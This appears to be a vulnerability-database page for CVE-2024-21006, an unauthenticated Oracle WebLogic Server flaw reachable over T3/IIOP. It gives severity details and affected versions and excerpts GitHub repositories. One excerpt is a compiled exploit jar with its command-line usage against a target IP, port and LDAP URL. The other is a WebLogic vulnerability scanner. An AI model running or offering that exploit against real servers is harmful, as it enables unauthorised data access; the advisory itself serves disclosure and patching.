Published: 16/04/2024 Updated: 27/11/2024

Unauthenticated Oracle WebLogic Server Vulnerability Exposes Critical Data

A security issue exists in the Oracle WebLogic Server from Oracle Fusion Middleware, specifically in the Core part. It affects versions 12.2.1.4.0 and 14.1.1.0.0. An attacker without authentication can easily exploit it if they have network access through T3 or IIOP. If they succeed, they might get unauthorized access to important data or even all data the Oracle WebLogic Server can reach. This vulnerability has a CVSS 3.1 Base Score of 7.5, mainly affecting confidentiality. The CVSS Vector is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Vulnerable Product	Search on Vulmon	Subscribe to Product
oracle weblogic server 12.2.1.4.0
oracle weblogic server 14.1.1.0.0

CVE-2024-21006 exp

CVE-2024-21006_jar exp代码参考：githubcom/momika233/CVE-2024-21006 这里将源代码编译成了一个jar包，方便使用。lib下是依赖文件，如果想修改源码可自行编译。使用 java -jar CVE-2024-21006jar <ip> <port> <ldapUrl> 复现过程遇到的问题：mom

weblogic专项漏扫命令行工具，

Getting Started 功能简介 1 命令详情介绍命令说明： -h :查看所有命令详情 -l :查看所有支持检测的漏洞列表 -bList :查看所有支持批量检测的漏洞列表 -sVersion :精确扫描目标版本，已支持, Weblogic: Usage: java -jar xxjar -sVersion <targetIp> <TargetPort> jndi使用说明: Usage

CVE-2024-21006 CVE-2024-21006 Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core) Supported versions that are affected are 122140 and 141100 Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server Successful attacks of this vu

NVD-CWE-noinfo https://nvd.nist.gov https://github.com/lightr3d/CVE-2024-21006_jar https://www.first.org/epss https://www.oracle.com/security-alerts/cpuapr2024.html https://www.oracle.com/security-alerts/cpuapr2024.html

CVE-2024-21006

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect